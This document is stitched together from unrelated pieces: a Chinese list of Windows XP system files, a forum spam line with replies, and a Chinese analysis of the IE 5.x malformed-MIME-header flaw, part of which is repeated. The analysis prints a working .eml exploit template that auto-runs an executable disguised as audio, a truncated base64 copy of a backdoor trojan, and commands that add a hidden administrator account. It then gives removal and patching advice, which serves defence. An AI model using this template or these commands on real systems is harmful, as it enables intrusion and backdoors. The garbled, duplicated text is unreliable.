ckcnv.exe ......Cookie 转换工具
cnvfat.dll .....FAT 文件系统转换工具 DLL 
comcat.dll .....Microsoft C 运行时库文件 
comctl32.ocx ...Windows 通用控件 ActiveX 控件 DLL 

COMP.EXE .......(比较). 用于比较两个文件之间的差别. 

compatUI.dll ...CompatUI Module 
compobj.dll ....OLE 2.1 16/32 互用性 

------------------------------------------------------- 

compstui.dll ...通用属性表用户界面DLL 

没有这个文件的话, 你可能无法访问打印机属性或是打印机参数. 

------------------------------------------------------- 


CONFIG.TMP ..... 
confmsp.dll ....Microsoft IP 会议媒体服务提供程序

CONIME.EXE .....(输入法控制台). 这个输入法控制台用于转换字符. 

console.dll ....控制面板控制台小程序

control.exe ....Windows 控制面板 (这个不是实际上的控制面板.) 

CONVERT.EXE ....(转换). 用于将分区格式从 FAT 转为 NTFS 以及从 NTFSv4 转为 NTFSv5. 

corpol.dll .....Microsoft COM 运行时执行引擎
country.sys .... 
cryptdlg.dll ...Microsoft 通用证书对话框
cryptext.dll ...加密外壳扩展 
cryptnet.dll ...加密网络相关 API 

CSCRIPT.EXE ....(基于命令行的脚本宿主). 能让你通过命令行运行 VBScript 和 JScript 脚本. 

ctfmon.exe ....CTF 加载器 (在你安装手写识别, 语音识别, 输入法编辑器之后, 就会在任务栏上显示一个语言栏. 还有, 如果你添加了第二种语言或是键盘布局, 也会导致显示语言栏的.) 

ctl3d32.dll ....Ctl3D 3D Windows 控件 
ctl3dv2.dll ....Ctl3D 3D Windows NT(WOW) 控件

Dcache.bin ..... 
dbgeng.dll .....符号调试引擎
DEBUG.EXE ......(调试程序). 命令行下的调试工具. 

DEFRAG.EXE .....(磁盘碎片整理). 用于整理磁盘碎片的命令行工具. 

desktop.ini .... 

DFRGFAT.EXE ....(FAT 碎片整理工具). 用于整理 FAT 分区上的磁盘碎片. 

dgnet.dll ......Dgnet Module 
dgrpsetu.dll ...Digi RealPort® 驱动升级 
dgsetup.dll ....DGSETUP DLL 
dhcpmon.dll ....DHCP Monitor Dll 
dhcpsapi.dll ...DHCP Server API Stub DLL 

DIANTZ.EXE .....(Cab 打包程序). 用于将文件打包为 .cab 文件. 

digest.dll .....Digest SSPI 认证包 

DLLHOST.EXE ....(COM+ 服务器进程). COM+ 进程管理器. 

DLLHST3G.EXE ...(COM 代替品). 一个 COM+ 进程组件. 
dmconfig.dll ...逻辑磁盘管理器配置库 

DOSKEY.EXE .....(DOS 键盘). MS-DOS 5.0 键盘输入历史记录器,能提供宏. 

DOSX.EXE .......(DOS 扩展器). 一个 DOS 虚拟机 (VDM), 提供标准模式. 

DRWATSON.EXE ...(Dr. Watson).16位的程序错误监测和记录工具. 

DRWTSN32.EXE ...(Dr. Watson 32). 32位的程序错误监测和记录工具.

dsauth.dll .....用于服务的DS 认证 

edit.com ....... 
edit.hlp ....... 
EDLIN.EXE ......(编辑行). 基于 DOS 的编辑器. 
emptyregdb.dat .. 
encdec.dll .....XDSCodec & Encypter/Decrypter 标识滤镜 
EqnClass.Dll ...Equinox 多端口串行协同安装程序

esent97.dll ....Microsoft(R) Windows NT(TM) 服务器数据库存储引擎

esentprf.dll ... 服务器数据库存储性能库
esentprf.hxx ... 
esentprf.ini ... 
esentutl.exe ... 服务器数据库存储工具 

EUDCEDIT.EXE ...(私有字符编辑器). 一个造字程序, 可让你创建大约6400 个私有字符. 

EXE2BIN.EXE ....(Exe to Bin). 基于 DOS, 用于将 .exe 文件转为.bin 文件. 

EXPAND.EXE .....(Expand). 用于展开 Cab 压缩包中的某些文件. 

expsrv.dll .....Visual Basic 运行时文件 

extmgr.dll .....扩展管理器 


EXTRAC32.EXE ...(CAB 文件提取工具). 用于解压缩 Cab 压缩包

exts.dll .......调试器扩展 

FASTOPEN.EXE ...(快速打开). 一个 DOS 工具, 用于改善系统性能, 加速访问经常用到的文件. 



fc.exe .........文件比较工具
fe客户端.dll ...Windows NT 文件加..密客户端接口
find.exe .......查找字符串 (Grep) 的工具 
findstr.exe .... 查找字符串 (QGrep) 的工具

FIXMAPI.EXE ....(MAPI 修复工具). 探测并解决 (MAPI) 文件出现的问题. 

fldrclnr.dll ...桌面清理向导 
fltlib.dll .....筛选库
fltMc.exe ......筛选管理器控制程序
fontsub.dll ....字体设置DLL 

FORCEDOS.EXE ...(强制 DOS). 强制在 Windows XP 下将包含 OS/2 和 DOS 代码的程序运行在 DOS 模式下. 

format.com .....Disk Format Utility格式化命令 

fsmgmt.msc .....Microsoft 通用控制台文档 (共享文件夹) 

fsquirt.exe ....(属于蓝牙) 
fsusd.dll ......摄像头设备 DLL 

 

FSUTIL.EXE .....(FSUtil). 一个卷管理工具. 重分析点管理和稀疏文件控制 

FTP.EXE ........(FTP). 命令行模式下的 FTP 工具. 

ftsrch.dll .....Microsoft® 文本搜索 

g711codc.ax ....Intel G711 CODEC 
gcdef.dll ......游戏控制器的默认表 

GDI.EXE ........(物理设备接口). 一个核心系统组件, 可以提供 Win16 图形设备接口API l库, 以实现向后兼容. 

gpkrsrc.dll ....Gemplus 加.密服务提供程序资源文件 
graftabl.com ...代码页工具 
graphics.com ... 

h323.tsp ....... 
h323msp.dll ....Microsoft H.323 媒体服务提供程序 
hccoin.dll .....USB 协同安装程序 

HELP.EXE .......(帮助). 显示 Windows XP 命令的基本常规帮助信息. 

hidphone.tsp ... 
hlink.dll ......Microsoft 超链接库 
hnetmon.dll ....家庭网络监视 DLL 
hnetwiz.dll ....网络安装向导 
homepage.inf ... 
hotplug.dll ....用于安全移除硬件, 比如, U 盘 
HSFCISP2.dll ...HSF 协同安装程序
httpapi.dll ....HTTP 协议堆栈 API 


iccvid.dll .....(Cinepak® Codec) 用于显示 'Cinepak' 格式的媒体文件. (非常古老的 A.VI 编,解.码格式.) 

IE4UINIT.EXE ...(IE 安.装工具). IE 5.0 每用户安.装工具. 

iedkcs32.dll ...Microsoft Internet Explorer 定.制 DLL 
ieencode.dll ...Microsoft 字符编码 
iernonce.dll ...带用户界面的扩展 RunOnce 处理库 
iesetup.dll ....IOD 版本映射 
ieuinit.inf .... 

IEXPRESS.EXE ...(自解压和自安装创建程序). 用于创建自解压包或是自.安.装程序包. 

ifmon.dll ......IF Monitor DLL 
igmpagnt.dll ...Microsoft IGMP subagent 
ils.dll ........用户位置服务组件模块
imeshare.dll ...Microsoft Office IME 共.享属性库 
inetmib1.dll ...Microsoft MIB-II subagent 
initpki.dll ....Microsoft 受信赖的安装和设置

input.dll ......(文本输入 DLL). 语言和区域设置需要这个文件来显示相关对话框

inseng.dll .....(安装引擎). Active Setup 安装引擎, 允许打开或执行 cab 文件. 用于控制安装. 

instcat.sql ....用于安装编录

intl.cpl .......区域和语言设置 

iologmsg.dll ...IO 日志 DLL 
ipconf.tsp ..... 
iprop.dll ......OLE 属性集


ir32_32.dll .... 
ir41_32.ax .....Intel Indeo® Video 4.5 

ir41_qc.dll ....Intel Indeo® 视频快速压缩编码器 (文件版本: 4.30.62.2)
ir41_qcx.dll ...Intel Indeo®视频快速压缩编码器 (文件版本: 4.30.62.2) 

ir50_32.dll ....Intel Indeo® video 5.10 (文件版本: 5.2562.15.55) 

ir50_qc.dll ....Intel Indeo® 5.10视频快速压缩编码器(文件版本: 5.0.63.48 ) 


mode.com .......DOS 命令
modex.dll ......ModeX 显示驱动
more.com .......Dos 命令
moricons.dll ...Windows NT 安装图标资源库 

MOUNTVOL.EXE ...(卷加载器). 创建, 列出以及修改你的存储卷加载点. 

mpg4ds32.ax ....(文件版本: 8.0.0.4487). Microsoft MPEG-4 视频解码器

mplay32.exe ....Windows Media Player 5.1 (非常古老的媒体播放器.) 

MRINFO.EXE .....(多播信息). 用于查询多播路由器接口的命令行工具. 

msacm.dll ......Microsoft 音频压缩管理器
msaatext.dll ... Active Accessibility 文本支持

msadds32.ax ....(文件版本: 8.0.0.4487). Windows Media 音频解码器 

msafd.dll ......Microsoft Windows Sockets 2.0 服务提供程序 
msapsspc.dll ...32 位平台下的 DPA 客户端
msaudite.dll ...安全审核事件 DLL 
mscat32.dll ....MSCAT32 Forwarder DLL 
MSCTFP.dll .....MSCTFP Server DLL 
msdadiag.dll ...Microsoft Data Access – 内建诊断 
msdart.dll .....Microsoft Data Access - OLE DB 例行运行时 
msdatsrc.tlb ... 
msdtcprf.ini ... 
msencode.dll ...Microsoft 字符编码器
msieftp.dll ....Microsoft Internet Explorer FTP 文件夹外壳扩展 
msimsg.dll .....Windows® Installer 国际消息 
mslbui.dll ..... 
msnsspc.dll ....MSN Internet Access 
msobjs.dll .....系统对象审核名称 
MsPMSNSv.dll ...Microsoft 媒体设备服务提供程序
msr2c.dll ......Microsoft Forms DLL 
msr2cenu.dll ...Microsoft Forms DLL 
msratelc.dll ...Internet 分级和本地用户管理DLL 
msrating.dll ...Internet 分级和本地用户管理DLL 
msrclr40.dll ...Microsoft Jet公文包调解程序
msrd2x40.dll ...Microsoft (R) Red ISAM 
msrd3x40.dll ...Microsoft (R) Red ISAM 
msrecr40.dll ...Microsoft Jet公文包调解程序资源库
msrepl40.dll ...Microsoft 复制库 
msrle32.dll ....Microsoft RLE 压缩器

msscds32.ax ....(文件版本: 8.0.0.4487). Microsoft 屏幕视频解压器

msscript.ocx ...Microsoft (r) 脚本控件 

mssign32.dll ...Microsoft 受信赖签证 APIs 
mssip32.dll ....MSSIP32 Forwarder DLL 

mstime.dll .....Microsoft (R) 用于 HTML 的定时交互多媒体扩展

msswch.dll .....(屏幕键盘). 用于 msswchx.exe. 

msswchx.exe ....msswchx (属于屏幕键盘.) 

msutb.dll ......MSUTB 服务器 DLL


------------------------------------------------------- 

msvbvm50.dll ...Visual Basic 虚拟机 (文件版本: 5.2.82.44) 

这是个老版本的 VB 虚拟机. msvbvm60.dll (也是 VB 虚拟机)文件版本: 6.0.96.90 

------------------------------------------------------- 

msvcirt.dll ....Windows NT IOStreams DLL 
msvcp50.dll ....Microsoft (R) C++ 运行时库文件
msvcrt20.dll ...Microsoft® C运行时库文件
msvcrt40.dll ...VC 4.x CRT DLL (向后兼容 msvcrt.dll) 
msvideo.dll ....Microsoft Video for Windows DLL 
msxml.dll ......XML OM for Win32 
msxml2.dll .....XML OM for Win32 
msxml2r.dll ....XML2 资源文件
msxmlr.dll .....XML 资源文件 
msyuv.dll ......Microsoft UYVY 视频解压器
mtxoci.dll .....对于Oracle 的 Microsoft 数据库支持 DLL 
mydocs.dll .....我的文档文件夹用户界面

ncxpnt.dll .....Netork (不是 Network) 安装向导支持 DLL 

ndptsp.tsp ..... 

NET.EXE ........(Network). 用于管理, 配置和查看与网络相关的信息, 例如 net use, net print, net user, 等等. 



net.hlp ........ 


NET1.EXE .......(Network). 与 NET.EXE 的功能相同. 

netapi.dll .....Microsoft 网络动态链接库
neth.dll .......网络帮助消息 DLL 
netplwiz.dll ...映射网络驱动器向导
netsetup.cpl ...网络安装向导控制面板小程序

NETSETUP.EXE ...(网络安装向导). 通过软盘帮你配置电脑网络. 

netui0.dll .....NT LM UI Common Code - GUI Classes (文件版本: 5.1.2600.2180) 

netui1.dll .....NT LM UI Common Code - GUI Classes (文件版本: 5.1.2600.2180) 

netui2.dll .....NT LM UI Common Code - GUI Classes (文件版本: 5.1.2600.0) <-- 版本要比 netui1.dll 老? 

netrap.dll .....网罗远程管理协议DLL 


------------------------------------------------------- 

所有的 "noise", "wbcache" 和 "wbdbase" 文件 (不同语言下的文件) 都可被删除.

(它们大都是索引服务用到的文件, 可通过 nLite 删除) 

(下列文件列在了注册表中的这个位置: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex\Language) 

noise.chs <<简体中文
noise.cht <<繁体中文
noise.dat 
noise.deu <<...注意: ...DEU = 这是德国的
noise.eng 
noise.enu <<英文 
noise.esn < noise.fra < noise.ita < noise.nld < noise.sve < noise.tha 

wbcache.deu 
wbcache.enu <<英文
wbcache.esn < wbcache.fra < wbcache.ita < wbcache.nld < wbcache.sve < 
wbdbase.deu 
wbdbase.enu <<英文 
wbdbase.esn < wbdbase.fra < wbdbase.ita < wbdbase.nld < wbdbase.sve < 

------------------------------------------------------- 

npptools.dll ...NPP 工具助手 DLL 
nscompat.tlb ... 

NSLOOKUP.EXE ...(域名服务器查寻). 用于显示 DNS 服务器的诊断和统计信息. 

ntlsapi.dll ....Microsoft® 许可服务器接口 DLL 

ntdos404.sys ... 
ntdos411.sys ... 
ntdos412.sys ... 
ntdos804.sys ... 
ntimage.gif .... 
ntio404.sys .... 
ntio411.sys .... 
ntio412.sys .... 
ntio804.sys .... 
ntlanman.dll ...Microsoft® 局域网管理器
ntlanui.dll .... 
ntlanui2.dll ...网络对象外壳用户界面

NTSD.EXE .......(符号调试器). 系统出问题时, 这个疑难解答工具就会详细列出系统状态. 

ntsdexts.dll ... Windows 2000 下的符号调试工具
nwprovau.dll ...用于 NetWare 提供程序和认证的客户端服务

NTVDM.EXE ......(NT DOS 虚拟机). 提供用于 DOS 程序和Windows-on-Windows (WOW—支持 Win16) 的虚拟机. 

ntvdmd.dll .....NTVDMD.DLL 

oakley.dll .....Oakley 键盘管理器 
objsel.dll .....对象挑选对话框 
occache.dll ....对象控件查看器 

OSUNINST.EXE ....(卸载工具). 用于卸载Windows XP, 并将其还原到升级前使用的Windows 操作系统. 可在安全模式下运行于命令行模式.

------------------------------------------------------- 

oembios.bin .... 
oembios.dat .... 
oembios.sig .... 

删掉 oembios.sig 的话, 可能会导致系统栏提示 "还剩下X 天用于激活 Windows". 这个可能会发生在 OEM 版 Windows 中. 如果出现了这种情况, 请将其放回.

-------------------------------------------------------

ole2.dll .......OLE 2.1 16/32相互操作库
ole2disp.dll ...OLE 2.1 16/32相互操作库
ole2nls.dll ....OLE 2.1 16/32相互操作库
oleprn.dll .....Oleprn DLL 

p2p.dll ........点对点群 
p2pgasvc.dll ... 点对点群认证服务
p2pgraph.dll ... 点对点图形
p2pnetsh.dll ... 点对点NetSh 助手
p2psvc.dll ..... 点对点服务

PACKAGER.EXE ...(Object Packager). 用于在文档中创建嵌入数据的图标链接. 

panmap.dll .....PANOSE™ 字体映射器 
paqsp.dll ......PaqSP Module 
pautoenr.dll ...自动注册 DLL 
pcl.sep ........ 

PENTNT.EXE .....(NT Pentium 测试工具). 一个用于检测你的系统是否有Pentium 浮点运算错误的命令行工具. (我还把在 “性能” 中的快捷方式删掉了). 
pifmgr.dll .....Windows NT PIF 管理器图标资源库
pjlmon.dll .....PJL 语言监视器
plustab.dll ....效果控制面板扩展
pmspl.dll ......Microsoft 局域网管理器 2.1 网络动态
polstore.dll …策略存储 dll 
powercfg.exe ...电源设置命令行工具
pnrpnsp.dll ....PNRP 命名空间提供程序
proctexe.ocx ...Intel 程序纹理
prodspec.ini ... 

PROGMAN.EXE ....(程序管理器). 可用于替换 Windows XP 资源管理器的外壳. 它的主界面基于 Windows 3.x, Windows for Workgroups, 和 Windows NT 3.51. 


pschdcnt.h ..... 
pschdprf.dll ...Microsoft® Windows(TM) PSched 性能监视器 
pschdprf.ini ... 
pscript.sep .... 

psnppagn.dll ... NPPAgent对象的 DCOM 代理
pubprn.vbs ..... 

proquota.exe ...ProQuota 能让你设置一个用户配置文件的最大大小. 

PROXYCFG.EXE ...(代理配置工具). 一个用于查看和更改你当前代理设置的命令行工具. 

qmgrprxy.dll ...后台智能传输服务代理
qosname.dll ....Microsoft Windows GetQosByName 服务提供程序
query.dll ......目录索引工具 DLL 

rdpdd.dll ......RDP 显示驱动 

RECOVER.EXE ....(还原). 一个用于从有问题的驱动器中还原可读数据的命令行工具.

REDIR.EXE ......(Redirector).Win16 网络重定向工具. 
remotesp.tsp... 

REG.EXE ........(注册表控制台). 一个用于查询和修改注册表的命令行工具. 

REGEDT32.EXE ...(注册表编辑器). 一个 32 位的注册表工具, 可用于设置注册表中相关项值的安全权限. 在 Windows XP 中, 原本带有更多功能的 regedt32.exe 已被合并regedit.exe 中了. Regedt32.exe 现在只不过相当于一个快捷方式. 如果你运行 regedt32.exe, 那么系统就会自动启动 regedit.exe 

regsvc.dll .....远程注册表服务

REGWIZ.EXE .....(注册向导). 令注册 XP 的过程自动化. 

regwizc.dll .... 注册向导的相关模块
rend.dll .......Microsoft 集合控件 
REPLACE.EXE ....(Replace). 用于替换文件的命令行工具. 
rnr20.dll ......Windows Socket2 命名空间 DLL 
routetab.dll ...Microsoft 路由表 DLL 
rpcns4.dll .....Remote Procedure Call 命名服务客户端 
rsmps.dll ......RSM 代理存根

顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶顶

晕

你顶虾米？

我认识你么？

　　运行金山毒霸，报告发现“backdoor bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（只有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信（报告服务端所在的IP地址）、上传下载……如果你中了该木马，那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务，这样别人就有全部权限进入你的电脑了！控制你的电脑将非常容易！

　　让我感兴趣的是，木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，哈哈！这回wincfg.exe不再下载了。 

　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
IFRAME src="wincfg.eml" width=1 height=1 

　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！ 


打开a.eml，发现其内容如下： 

From: "xxx" To: "xxx" Subject: xxxx 
Date: Tue, 7 Apr 2001 15:16:57 +800 
MIME-Version: 1.0 
Content-Type: multipart/related; 
type="multipart/alternative"; 
boundary="1" 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Unsent: 1 

--1 
Content-Type: multipart/alternative; 
boundary="2" 

--2 
Content-Type: text/html; 
charset="gb2312" 
Content-Transfer-Encoding: quoted-printable 

HTML> 
HEAD> 
/HEAD> 
BODY bgColor=3D#ffffff> 
iframe src=3Dcid:THE-CID height=3D0 width=3D0> 

/BODY> 


--2-- 

--1 
Content-Type: audio/x-wav; 
name="wincfg.exe" 
Content-Transfer-Encoding: base64 
Content-ID: 

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节) 

--1 


你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：

Content-Type: audio/x-wav; 
name="wincfg.exe"
Content-Transfer-Encoding: base64 
Content-ID: 

　　其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。 而这一句：Content-Transfer-Encoding: base64则定义了代码格式为base64。 

　　从这句Content-ID: 开始才是代码的起步，“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。

　　1.MIME简介
　　MIME(Multipurpose Internet Mail Extentions)，一般译作“多用途的网际邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息：e-mail，usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型，其中有一行叫作Content-type的语句，它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。


　　2.错误的MIME头漏洞的发现 
　　该漏洞是由一个国外安全小组发现的，该小组发现在MIME在处理不正常的MIME类型时存在个问题，攻击者可以创建一个Html格式的E-mail，该E-mail的附件为可执行文件，通过修改MIME头，使IE不正确处理这个MIME所指定的可执行文件附件。在此，我们来了解一下，IE是如何处理附件的：一般情况下如果附件是文本文件，IE会读它，如果是VIDEO CLIP，IE会查看它；如果附件是图形文件，IE就会显示它；如果附件是一个EXE文件呢？IE会提示用户是否执行！但令人恐惧的是，当攻击者更改MIME类型后，IE就不再提示用户是否执行而直接运行该附件！从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。大家不妨想像一下，如果前面提到的wincfg.exe不是木马，而是恶意程序江民炸弹又会怎么样？刹那间，你的硬盘就完蛋了(如果你不懂解法的话)！在Win9X\ME以及WinNT4和Win2k下的Internet Explorer 5.0、5.01、5.5均存在该漏洞，我们常用的微软邮件客户端软件Outlook Express也存在此漏洞。 

　3.错误的MIME头漏洞的危害
　　让我们来看一下如果把上面所说的代码中最后这部分变为下面这样，会产生什么结果呢？

--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: 

msgbox("你的计算机好危险哦") 说明：在此可以加上任意的VBS的代码

--1 

　　将该程序编辑存为eml格式的文件，我们运行它，可以看到屏幕上打开一个窗体，显示“你的计算机好危险哦”。对于这种利用错误的MIME头漏调用VBS文件的形式，会有多大危害呢？想一想，当初的爱虫病毒是怎么样的？爱虫病毒还需要骗你执行它才使你中毒，但一旦和错误MIME头漏洞结合起来，就根本不需要你执行了，只要你收了这封信且阅读它，你就中招了。

　　不仅如此，MIME还可以与command、cmd命令相结合，进行进一步的攻击。

　　对于WIN9X用户来说，只要你的IE浏览器是5.0、5.01、5.5之中的任意一个版本，在没打补丁的情况下，攻击者完全可以利用欺骗的方式让你打开含有攻击命令的、带有错误MIME头的E-mail文件，达到攻击的目的。事实上，format、deletetree、move等一切MS-DOS下的命令均可加载在其中。 

　　而对于WINNT、WIN2K用户，尤其是那些不安分守己且网络安全知识贫乏的系统管理员，利用公司的主服务器上网，攻击者可以给他发封信，然后利用在以上所示代码中加上诸如： 
net user test 1234567/add 
net localgroup administrators test/add 
这样的命令增加用户或者超级用户权限，达到进一步入侵的目的。 

　　现在，再回过头来看看我所中的木马是怎么回事。其实，wincfg.exe这个文件在这里相当于邮件的附件，从我们所列的代码中可以看到，攻击者把wincfg.exe的的类型定义为audio/x-wav，由于邮件的类型为audio/x-wav时，IE存在的这个错误的MIME头漏洞会将附件认为是音频文件自动尝试打开，结果导致邮件文件a.eml中的附件wincfg.exe被执行。在win2000下，即使是用鼠标点击下载下来的a.eml，或是拷贝粘贴该文件，都会导致a.eml中的附件被运行，微软的这个漏洞可真是害人不浅啊。现在看来，原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序，是多么落后的手段啊！如今，利用微软“创造”的这个大漏洞来进行攻击，是那么的简单、多么的容易啊！唯一的条件就是被攻击目标使用IE5.0、5.01、5.5这些浏览器中的一种，使用IE浏览器的用户到底有多少呢？看看你身边的朋友就知道答案了！

　解决办法：

　　如果你浏览网页中了该木马，可以用下面的方法来加以解决：

　　(1)点击“开始”→“运行”，在弹出的对话框中输入regedit，回车。然后展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下删除wincfg.exe；
　　(2)到你的计算机的系统目录下，如果操作系统是Win2000，则到c:\winnt下；如果你的操作系统为Win98，则到c:\windows下，删除其中的wincfg.exe 文件。
　　(3)重新启动机器，一切OK了！

　　预防方法：

　　1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE，用Foxmail代替Outlook。如果非要用，建议你按下面的方法进行操作：

　　(1)运行IE，点击“工具→Internet选项→安全→Internet区域的安全级别”，把安全极别由“中”改为“高”。 
　　(2)接着，点击“自定义级别”按钮，在弹出的窗口中，禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”选项。 
　　(3)同理，在此窗口中禁用IE的“活动脚本”和“文件下载”功能。 
　　(4)禁用所有的ActiveX控制和插件。 
　　(5)设置资源管理器成“始终显示扩展名”。
　　(6)禁止以WEB方式使用资源管理器。
　　(7)取消“下载后确认打开”这种扩展名属性设置。
　　(8)永远不直接从IE浏览器中选择打开文件。 

　　2.不要受陌生人的诱惑打开别人给你的RUL，如果确实想看，可以通过一些下载工具把页面下载下来，然后用记事本等一些文本编辑工具打开查看代码。 

　　3.微软公司为该漏洞提供了一个补丁，赶快到下面所列出的URL去看看吧：
http://www.microsoft.com/windows/ie/download/critical/
Q290108/default.asp

　　运行金山毒霸，报告发现“backdoor bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（只有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信（报告服务端所在的IP地址）、上传下载……如果你中了该木马，那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务，这样别人就有全部权限进入你的电脑了！控制你的电脑将非常容易！

　　让我感兴趣的是，木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，哈哈！这回wincfg.exe不再下载了。 

　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
IFRAME src="wincfg.eml" width=1 height=1 

　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！ 


打开a.eml，发现其内容如下： 

From: "xxx" To: "xxx" Subject: xxxx 
Date: Tue, 7 Apr 2001 15:16:57 +800 
MIME-Version: 1.0 
Content-Type: multipart/related; 
type="multipart/alternative"; 
boundary="1" 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Unsent: 1 

--1 
Content-Type: multipart/alternative; 
boundary="2" 

--2 
Content-Type: text/html; 
charset="gb2312" 
Content-Transfer-Encoding: quoted-printable 

HTML> 
HEAD> 
/HEAD> 
BODY bgColor=3D#ffffff> 
iframe src=3Dcid:THE-CID height=3D0 width=3D0> 

/BODY> 


--2-- 

--1 
Content-Type: audio/x-wav; 
name="wincfg.exe" 
Content-Transfer-Encoding: base64 
Content-ID: 

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节) 

--1 


你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：

Content-Type: audio/x-wav; 
name="wincfg.exe"
Content-Transfer-Encoding: base64 
Content-ID: 

　　其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。 而这一句：Content-Transfer-Encoding: base64则定义了代码格式为base64。 

